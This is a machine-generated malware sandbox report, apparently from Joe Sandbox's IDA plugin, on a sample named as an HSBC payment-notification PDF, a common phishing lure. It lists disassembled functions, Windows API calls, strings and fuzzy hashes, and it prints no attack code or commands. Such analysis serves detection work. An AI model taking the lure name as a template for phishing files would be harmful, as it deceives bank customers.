Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: 8774e4f041890dbc2a91042b0544c15fbc059514b46ccdf9cc1dd7305ce15ae1
Instruction ID: 17ca608856519cd1955488b4f204772d3e00e2da9bda675b1abbe090807247ff
Opcode Fuzzy Hash: 8774e4f041890dbc2a91042b0544c15fbc059514b46ccdf9cc1dd7305ce15ae1
Instruction Fuzzy Hash: A521A174200605BFEB505F60FC88F2A3BA9EB44749F25543EF102922B1EB758D549B6F

Function 0045C267 Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 0045C283
GetWindowRect.USER32(00000000,?), ref: 0045C295
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0045C2F3
GetDlgItem.USER32(?,00000002), ref: 0045C2FE
GetWindowRect.USER32(00000000,?), ref: 0045C310
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0045C364
GetDlgItem.USER32(?,000003E9), ref: 0045C372
GetWindowRect.USER32(00000000,?), ref: 0045C383
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0045C3C6
GetDlgItem.USER32(?,000003EA), ref: 0045C3D4
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0045C3F1
InvalidateRect.USER32(?,00000000,00000001), ref: 0045C3FE

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: ee900cb0418c209eff2971d5848f65fb009066793c70c2948a602d6ec38bc7ab
Instruction ID: 11649da17df5d0755d73b9da25d5b781727aa351e01af551b5c423be9c7c6dfa
Opcode Fuzzy Hash: ee900cb0418c209eff2971d5848f65fb009066793c70c2948a602d6ec38bc7ab
Instruction Fuzzy Hash: 62517071B00305AFDB08CFA9DD89AAEBBB6EB88311F14853DF915E7291D7709D448B14

Function 0040201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00401B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00402036,?,00000000,?,?,?,?,004016CB,00000000,?), ref: 00401B9A

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 004020D3
KillTimer.USER32(-00000001,?,?,?,?,004016CB,00000000,?,?,00401AE2,?,?), ref: 0040216E
DestroyAcceleratorTable.USER32(00000000), ref: 0043BCA6
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004016CB,00000000,?,?,00401AE2,?,?), ref: 0043BCD7
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004016CB,00000000,?,?,00401AE2,?,?), ref: 0043BCEE
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004016CB,00000000,?,?,00401AE2,?,?), ref: 0043BD0A
DeleteObject.GDI32(00000000), ref: 0043BD1C

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: 1fe7eb120fb530a9d0c3e86e2d255934ae6300064fd6ce35022d9647bea66392
Instruction ID: edfb5b42e1aee2da2af7767ce8276f4fdeab99f29820ea46fc720bac3244b47a
Opcode Fuzzy Hash: 1fe7eb120fb530a9d0c3e86e2d255934ae6300064fd6ce35022d9647bea66392
Instruction Fuzzy Hash: B0617E34101B10DFD735AF14CA48B2A77F1FB44316F50943EE642AAAE0C7B8A891DB99

Function 004021A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON

Download Yara Rule

APIs

Part of subcall function 004025DB: GetWindowLongW.USER32(?,000000EB), ref: 004025EC

GetSysColor.USER32(0000000F), ref: 004021D3

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: c544c20de1596d8a35e8bd9b7102db0368e0aafd3e371b07eaad61ce13d863f6
Instruction ID: b625a7fc61febfd2c935065ad26fa2a4911c749eaed189314b0e0014d1ee1d2c
Opcode Fuzzy Hash: c544c20de1596d8a35e8bd9b7102db0368e0aafd3e371b07eaad61ce13d863f6
Instruction Fuzzy Hash: 0B41E531000100EFDB215F68DC8CBBA3B65EB46331F1442BAFE619A2E1C7758C86DB69

Function 0046A8A7 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,0048F910), ref: 0046A90B
GetDriveTypeW.KERNEL32(00000061,004B89A0,00000061), ref: 0046A9D5
_wcscpy.LIBCMT ref: 0046A9FF

Strings

fixed, xrefs: 0046A953
all, xrefs: 0046A911
network, xrefs: 0046A969
cdrom, xrefs: 0046A927
ramdisk, xrefs: 0046A97F
removable, xrefs: 0046A93D
unknown, xrefs: 0046A996

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: BuffCharDriveLowerType_wcscpy
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2820617543-1000479233
Opcode ID: 75c02351080d399f54f50797f1575012d7efe7bac2141c4c0566531984a89c98
Instruction ID: 63d5a068ad5a56aba220708db6a6aa365c702eef260e2cf9077a2f95fd26ae7a
Opcode Fuzzy Hash: 75c02351080d399f54f50797f1575012d7efe7bac2141c4c0566531984a89c98
Instruction Fuzzy Hash: 6751AE711183009BC700EF15C892AAFB7E5EF94308F544C2FF495672A2EB399D19CA5B

Function 00426E03 Relevance: 16.8, APIs: 11, Instructions: 258COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00426E3E

Part of subcall function 00428B28: __getptd_noexit.LIBCMT ref: 00428B28

__gmtime64_s.LIBCMT ref: 00426ED7
__gmtime64_s.LIBCMT ref: 00426F0D
__gmtime64_s.LIBCMT ref: 00426F2A
__allrem.LIBCMT ref: 00426F80
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00426F9C
__allrem.LIBCMT ref: 00426FB3
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00426FD1
__allrem.LIBCMT ref: 00426FE8
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00427006
__invoke_watson.LIBCMT ref: 00427077

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
Instruction ID: cc18d51bddcb3bff235d9ba930da6ebb912618c2495e950f743dda1aeb2a8d13
Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
Instruction Fuzzy Hash: F8710876B00726ABD714AF79EC41B5BB3A4AF04328F55412FF514D7281EB78ED048B98

Function 00462527 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00462542
GetMenuItemInfoW.USER32(004C5890,000000FF,00000000,00000030), ref: 004625A3
SetMenuItemInfoW.USER32(004C5890,00000004,00000000,00000030), ref: 004625D9
Sleep.KERNEL32(000001F4), ref: 004625EB
GetMenuItemCount.USER32(?), ref: 0046262F
GetMenuItemID.USER32(?,00000000), ref: 0046264B
GetMenuItemID.USER32(?,-00000001), ref: 00462675
GetMenuItemID.USER32(?,?), ref: 004626BA
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00462700
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00462714
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00462735

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: b0f46b9daa1905a6cfa597ce9f08befe4fcaea4ae8b00d429bdca1168be675da
Instruction ID: d041e2a6511ad081bd824cff42eca7b157938f8ca15e77e0b80393dec237999e
Opcode Fuzzy Hash: b0f46b9daa1905a6cfa597ce9f08befe4fcaea4ae8b00d429bdca1168be675da
Instruction Fuzzy Hash: 3361B470900A49BFDB11CF64CE84DBF7BB8FB01345F14046AE842A7251E7B9AD05DB2A

Function 00486F23 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00486FA5
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00486FA8
GetWindowLongW.USER32(?,000000F0), ref: 00486FCC
_memset.LIBCMT ref: 00486FDD
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00486FEF
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00487067

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: MessageSend$LongWindow_memset
String ID:
API String ID: 830647256-0
Opcode ID: 4336d240a59bbb388c973f46f1178136a6457c7e14c292988be6c5ed4532a5ee
Instruction ID: 7132dcb9391edd1f4fca7d59f8acd98ed1f58d557d43f29f177e0b8d5bde9df6
Opcode Fuzzy Hash: 4336d240a59bbb388c973f46f1178136a6457c7e14c292988be6c5ed4532a5ee
Instruction Fuzzy Hash: 17618E75900208AFDB10EFA4CC85EEE77B8EB09700F20056AFA14A73A1C775AD51DB64

Function 00456B98 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00456BBF
SafeArrayAllocData.OLEAUT32(?), ref: 00456C18
VariantInit.OLEAUT32(?), ref: 00456C2A
SafeArrayAccessData.OLEAUT32(?,?), ref: 00456C4A
VariantCopy.OLEAUT32(?,?), ref: 00456C9D
SafeArrayUnaccessData.OLEAUT32(?), ref: 00456CB1
VariantClear.OLEAUT32(?), ref: 00456CC6
SafeArrayDestroyData.OLEAUT32(?), ref: 00456CD3
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00456CDC
VariantClear.OLEAUT32(?), ref: 00456CEE
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00456CF9

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: f1379b8d06b3f903a5e910e956f09b0d2a9745292c14bd0cd64e072d7f41818e
Instruction ID: 21fd5a8c16b11a42553d074c3324144f158a868588d4a73b9a3ed32873cef97c
Opcode Fuzzy Hash: f1379b8d06b3f903a5e910e956f09b0d2a9745292c14bd0cd64e072d7f41818e
Instruction Fuzzy Hash: F1418231A001199FCF00DFA9D8449AEBBB9EF18315F01847EE955E7362CB34A949CF94

Function 004783BB Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC

CoInitialize.OLE32 ref: 00478403
CoUninitialize.OLE32 ref: 0047840E
CoCreateInstance.OLE32(?,00000000,00000017,00492BEC,?), ref: 0047846E
IIDFromString.OLE32(?,?), ref: 004784E1
VariantInit.OLEAUT32(?), ref: 0047857B
VariantClear.OLEAUT32(?), ref: 004785DC

Strings

Invalid parameter, xrefs: 004784FA
NULL Pointer assignment, xrefs: 004784B3
Failed to create object, xrefs: 00478479, 0047852F

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 834269672-1287834457
Opcode ID: e4e8ad441c739ddd80c6c517f888890eca7b77d5193a955d0624545bb73c2104
Instruction ID: cb75df2b24e16c1c2e0b5d8d850f15e0fc33cba1d2aa6ec0deb68a9cf625d14d
Opcode Fuzzy Hash: e4e8ad441c739ddd80c6c517f888890eca7b77d5193a955d0624545bb73c2104
Instruction Fuzzy Hash: AA61C170648312AFC710DF14C848B9FB7E8AF44744F00881EF9899B291DB78ED48CB9A

Function 00458F8F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22

Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC

SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00459014
GetDlgCtrlID.USER32 ref: 0045901F
GetParent.USER32 ref: 0045903B
SendMessageW.USER32(00000000,?,00000111,?), ref: 0045903E
GetDlgCtrlID.USER32(?), ref: 00459047
GetParent.USER32(?), ref: 00459063
SendMessageW.USER32(00000000,?,?,00000111), ref: 00459066

Strings

ListBox, xrefs: 00458FD1
ComboBox, xrefs: 00458F9C

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: 70b00899020a6935ed5be547ea879312aebc4391e40c277213c8505d4346909e
Instruction ID: 6714b25adca5f569a88cfbaafbe7bd2dd1ba81f724cd7e2599907f028ed7346a
Opcode Fuzzy Hash: 70b00899020a6935ed5be547ea879312aebc4391e40c277213c8505d4346909e
Instruction Fuzzy Hash: D021D870A00108BFDF04ABA1CC85EFEB774EF45310F10062AF911672E2DB795819DB28

Function 0045A068 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,0045A439), ref: 0045A377

Strings

CLASS, xrefs: 0045A0F6
TEXT, xrefs: 0045A2AE
REGEXPCLASS, xrefs: 0045A13C
NAME, xrefs: 0045A1A9
CLASSNN, xrefs: 0045A119
INSTANCE, xrefs: 0045A285

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: ChildEnumWindows
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 3555792229-1603158881
Opcode ID: 1424eacf5de64af2c769219169cfdcdf02d038a0872950fffdd1f519614ed5ca
Instruction ID: 7454df241f77d0b93e78cd2df6a08ba454d4c5e8e9c0a671585cc9aba64ec447
Opcode Fuzzy Hash: 1424eacf5de64af2c769219169cfdcdf02d038a0872950fffdd1f519614ed5ca
Instruction Fuzzy Hash: BA91BB70600505AADB08DF61C452BEEF774BF04305F54822FEC59A7242DB3969ADCB99

Function 00402E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00402EAE

Part of subcall function 00401DB3: GetClientRect.USER32(?,?), ref: 00401DDC
Part of subcall function 00401DB3: GetWindowRect.USER32(?,?), ref: 00401E1D
Part of subcall function 00401DB3: ScreenToClient.USER32(?,?), ref: 00401E45

GetDC.USER32 ref: 0043CD32
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0043CD45
SelectObject.GDI32(00000000,00000000), ref: 0043CD53
SelectObject.GDI32(00000000,00000000), ref: 0043CD68
ReleaseDC.USER32(?,00000000), ref: 0043CD70
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0043CDFB

Strings

U, xrefs: 0043CCD0

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: 3cdb49cb97ee06b786ec44539fc98b371f27cf3cd913876941f0ba4c68568fc2
Instruction ID: a06c30b2c7428a2a0e02ce49fef1101dc5652c1e0a779c9989b3b0b616dc9c80
Opcode Fuzzy Hash: 3cdb49cb97ee06b786ec44539fc98b371f27cf3cd913876941f0ba4c68568fc2
Instruction Fuzzy Hash: 8A71CB31400205DFCF219F64C884AAB3BB5FF48324F14567BFD55AA2A6C7389881DBA9

Function 009D0FAB Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMON

Download Yara Rule

APIs

RtlDecodePointer.NTDLL(00000000), ref: 009D0FCE

Strings

exp, xrefs: 009D1093, 009D10F5
acos, xrefs: 009D1146
asin, xrefs: 009D113A
sqrt, xrefs: 009D1152
pow, xrefs: 009D10B2, 009D115E, 009D1171
log, xrefs: 009D1074, 009D1080
log10, xrefs: 009D1018, 009D1068

Memory Dump Source

Source File: 00000001.00000002.1385260628.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: DecodePointer
String ID: acos$asin$exp$log$log10$pow$sqrt
API String ID: 3527080286-3064271455
Opcode ID: be32a31624a26b7416591ff1dbac2357cd7ab8e55313fcea43f5f9bfefd98834
Instruction ID: 556734395b9de306b96b70fd456e16c32058073f71d9e71a2cb990445c4d5abb
Opcode Fuzzy Hash: be32a31624a26b7416591ff1dbac2357cd7ab8e55313fcea43f5f9bfefd98834
Instruction Fuzzy Hash: 7851957294824AEBDF10EF58EA481ECBBB8FF49300F208187D641A7364C7758E64DB14

Function 00478C46 Relevance: 13.9, APIs: 9, Instructions: 438COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,0048F910), ref: 00478D28
FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0048F910), ref: 00478D5C
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00478ED6
SysFreeString.OLEAUT32(?), ref: 00478F00

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

